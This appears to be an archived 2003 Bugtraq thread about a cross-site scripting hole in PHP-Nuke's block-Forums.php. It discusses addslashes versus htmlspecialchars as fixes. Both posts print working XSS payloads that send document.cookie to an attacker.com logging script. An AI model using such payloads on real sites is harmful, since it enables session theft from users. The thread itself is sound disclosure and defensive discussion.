Bugtraq mailing list archives
Re: PHP-Nuke block-Forums.php subject vulnerabilities
From: "Frog Man" <leseulfrog () hotmail com>
Date: Tue, 01 Apr 2003 12:48:28 +0200
I haven't tested but I don't think addslashes() is a good solution here. The same javascript can be executed without ' or ", like this : "><name=a><input type=hidden name=u value=http://www.attacker.com/prova.php></form>
<script>window.open(document.a.u.value+document.cookie)</script> What do you think about : $title2 = htmlspecialchars($title2, ENT_QUOTES);
From: <lethalman () libero it> To: bugtraq () securityfocus com Subject: PHP-Nuke block-Forums.php subject vulnerabilities Date: 31 Mar 2003 11:15:54 -0000 The block-Forums.php file have a vuln if an attacker insert a malformatted subject to a topic of Splatt Forum. A type of subject is: "><script>alert('bug'");</script> The 'alt' tag is closed by "> and the other text is normal html. This bug is very bad if a subject is: "><script>window.open('www.attacker.com/prova.php?cookie='+document.cookie);</script> And prova.php register cokkies in a file. The solution: Add under "$title2 = stripslashes($title2);" line, this line: "$title2 = addslashes($title2);" And now, backward any " there is a backslash!
-------------------------- frog-m@n http://www.phpsecure.info _________________________________________________________________
Current thread:
- Re: PHP-Nuke block-Forums.php subject vulnerabilities Frog Man (Apr 02)